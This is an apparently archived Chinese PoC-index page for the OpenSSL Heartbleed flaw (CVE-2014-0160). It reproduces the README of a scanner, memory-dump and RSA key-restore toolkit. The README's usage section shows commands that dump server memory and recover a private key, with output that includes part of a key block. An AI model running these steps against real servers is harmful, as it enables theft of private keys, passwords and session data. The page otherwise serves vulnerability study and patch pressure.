关联漏洞
标题:
OpenSSL 缓冲区错误漏洞
(CVE-2014-0160)
描述:OpenSSL是OpenSSL团队开发的一个开源的能够实现安全套接层(SSL v2/v3)和安全传输层(TLS v1)协议的通用加密库,它支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 OpenSSL的TLS和DTLS实现过程中的d1_both.c和t1_lib.c文件中存在安全漏洞,该漏洞源于当处理Heartbeat Extension数据包时,缺少边界检查。远程攻击者可借助特制的数据包利用该漏洞读取服务器内存中的敏感信息(如用户名、密码、Cookie、私钥等)。以下版本的OpenSSL受到
描述
OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner, data miner and RSA key-restore tools.
介绍
## OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner, data miner and RSA key-restore tools.
Author: Einar Otto Stangvik / @einaros / https://hacking.ventures
Since the cat is long since out of the bag, and others have begun publishing their tools,
I'm putting mine out there too. Hopefully this amplifies the pressure on those that still
haven't patched or upgraded their severs. Others may find the tools of educational value.
Unlike many other Heartbleed PoCs, this tool will supply most possible ciphers in the initial
ClientHello packet. Whatever cipher the server picks will be used for all subsequent ClientHello
packets in a dump session. That should ensure proper vulnerability detection, as well as
decrease overhead once a cipher has been found.
Use these tools as you please, but do us all a favor: Solve problems instead of creating them.
Inspired by the work and publications of:
- Jared Stafford
- Jeremi M Gosney
- Ben M Murphy
- ... and many others.
### Usage:
Here seen recovering one of the RSA primes of the CloudFlare challenge 34 times in one minute. That equals getting the full private key 34 times in one minute.
```
# Test vulnerability using unobtrusive mode
# This will request N bytes, but supply N-1 itself, so that the server will
# only actually bleed a single byte if vulnerable. Suggested N is 16360 in this
# case, since that will result in a single TLS record:
# 3 + 2 + 1 + 2 + 16360 + 16 bytes = 0xFFFF.
$ ./hb.py -u -n 16360 -p 443 www.example.int
www.example.int:443 is vulnerable
# Dupm data from CloudFlare's old challenge server
$ ./hb.py -p 443 www.cloudflarechallenge.com -n 0xF000 -l 100 -t 50 -d -o cloudflare-dump.bin
[2014/04/14 10:55:48] Incoming data rate: 85877 kbps
... runs for a while
# Look for prime in the dump
$ ./keyscan.py cloudflare.crt cloudflare-dump.bin
Key size: 128
Data length: 173476834
cloudflare-dump.bin Offset 0xf155ec: p = 13827796798740740191625032142481917804987720337701...
# Extract key once found
$ ./keyscan.py cloudflare.crt cloudflare-dump.bin 0xf155ec
Prime should be at offset: f155ec
Key size: 128
Hexdump of surrounding data:
f151ec: D0 00 00 00 00 00 00 00 00 00 00 00 00 00 30 C0 ..............0.
f151fc: 3C 01 00 00 00 00 00 00 00 00 00 00 00 00 90 8B <...............
f1520c: D0 00 00 00 00 00 02 00 C3 A3 4D 08 48 47 00 00 ..........M.HG..
...
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAm0AWkVnDx5feOctdC97Ztgvtd25uKKmhjCHpLycmExe1RiRSl/hGIL7f8Fg/
qiUztVm5uXZJ1UG7dzz+9OtTNh+v27BtzPsU3yivHevwAB1mTMtP6bPuXBjzsxRcC9yVcBBWpKBM
...
```
### License
The author can't and won't hold any right to any part of this package. It's based on open ideas,
and shall remain open for all he cares.
文件快照
[4.0K] /data/pocs/a8166731a1a38dcfb32c40851ee2504ce189e0ac
├── [ 14K] ciphers.py
├── [7.1K] hblib.py
├── [3.3K] hb.py
├── [2.2K] keydump.py
├── [1.3K] keyscan.py
└── [2.7K] README.md
0 directories, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。